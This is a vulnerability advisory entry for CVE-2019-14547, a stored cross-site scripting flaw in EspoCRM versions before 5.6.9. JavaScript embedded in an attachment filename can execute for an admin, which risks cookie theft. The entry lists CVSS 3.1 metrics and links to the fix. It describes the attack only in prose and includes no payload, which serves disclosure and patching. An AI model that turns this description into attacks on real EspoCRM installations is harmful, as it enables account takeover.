Stored Cross-Site Scripting in EspoCRM by EspoCRM, Inc.
CVE-2019-14547

5.4MEDIUM

Key Information:

Vendor

Espocrm

Status
Espocrm
Vendor
CVE Published:
5 August 2019

What is CVE-2019-14547?

A vulnerability exists in EspoCRM where an attacker may exploit stored cross-site scripting (XSS) by sending a maliciously crafted attachment to an admin user. This allows the attacker to embed JavaScript within the filename, which executes when the admin interacts with the file, potentially leading to cookie theft and account compromise. The vulnerability is present in versions prior to 5.6.9 and poses a risk to the security of administratively handled files.

References

https://github.com/espocrm/espocrm/commit/ffd3f762ce4a8de...
x_refsource_MISC
https://github.com/espocrm/espocrm/releases/tag/5.6.9
x_refsource_MISC
https://github.com/espocrm/espocrm/issues/1369
x_refsource_MISC

CVSS V3.1

Score:
5.4
Severity:
MEDIUM
Confidentiality:
Low
Integrity:
Low
Availability:
Low
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
Low
User Interaction:
Required
Scope:
Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.